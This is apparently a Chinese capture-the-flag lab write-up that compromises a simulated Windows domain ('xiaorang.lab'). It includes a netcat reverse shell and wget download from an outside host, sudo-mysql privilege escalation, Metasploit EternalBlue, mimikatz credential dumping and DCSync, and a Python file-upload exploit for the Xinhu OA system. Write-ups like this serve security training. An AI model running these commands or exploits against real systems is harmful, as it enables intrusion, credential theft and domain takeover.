首先拿到目标IP：39.99.156.72
通过Fscan进行扫描发现存在Thinkphp RCE漏洞。

./fscan_amd64 -h 39.99.156.72

然后通过利用工具进行RCE。

我们进行getshell之后通过蚁剑进行连接。

反弹shell并转换成python 交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 43.137.19.241 3377 >/tmp/f
python3 -c 'import pty; pty.spawn("/bin/bash")'

查看ip

hostname -I

上传fscan,并使用fscan扫描。

wget http://43.137.19.241:5000/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 172.22.1.0/24

[*] alive ports len is: 14
start vulscan
[*] NetInfo:
[*]172.22.1.21[->]XIAORANG-WIN7[->]172.22.1.21
[*] NetInfo:
[*]172.22.1.2[->]DC01[->]172.22.1.2
[*] NetInfo:
[*]172.22.1.18[->]XIAORANG-OA01[->]172.22.1.18
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc

紧接着通过sudo进行提权。

sudo -l

sudo -l

sudo mysql -e '\! cat /root/flag/flag01.txt'

flag{60b53231-

紧接着在fscan中可以看到存在一个ms17-010的机器，也就是172.22.1.21。

这里我们做一个nps隧道。

./npc -server=43.137.19.241:8024 -vkey=23qm41udjudhnbu0 -type=tcp

紧接着通过MSF打MS17-010。

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21

得多打几次。

上去之后先迁移进程防止掉了。

加载mimikatz并导出hash。

load kiwi
creds_all

这里的WIN7$机器账户有着DCSYNC的权限，我们可以直接dcsync也可以通过crack…来进行直接PTH。

kiwi_cmd lsadump::dcsync /all /csv

然后通过hash传递拿到第三个flag即可。

信呼协同办公系统:

弱口令： admin admin123

这个系统在2.2有一个文件上传的漏洞。

参考文章：https://blog.csdn.net/solitudi/article/details/118675321

exp:

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'YWRtaW4=::','adminpass': 'YWRtaW4xMjM=','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)

然后我们通过蚁剑挂代理进行连接。

连上之后发现是system权限，因为phpstudy启动需要管理员权限。

获取到第二段flag。

type c:\users\administrator\flag\flag02.txt
flag02: 2ce3-4813-87d4-

并且给出了提示说可以打域控了。

这里我得重启一下靶机，因为ms17-010一直返回不了session给打崩了。

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6} 最终flag。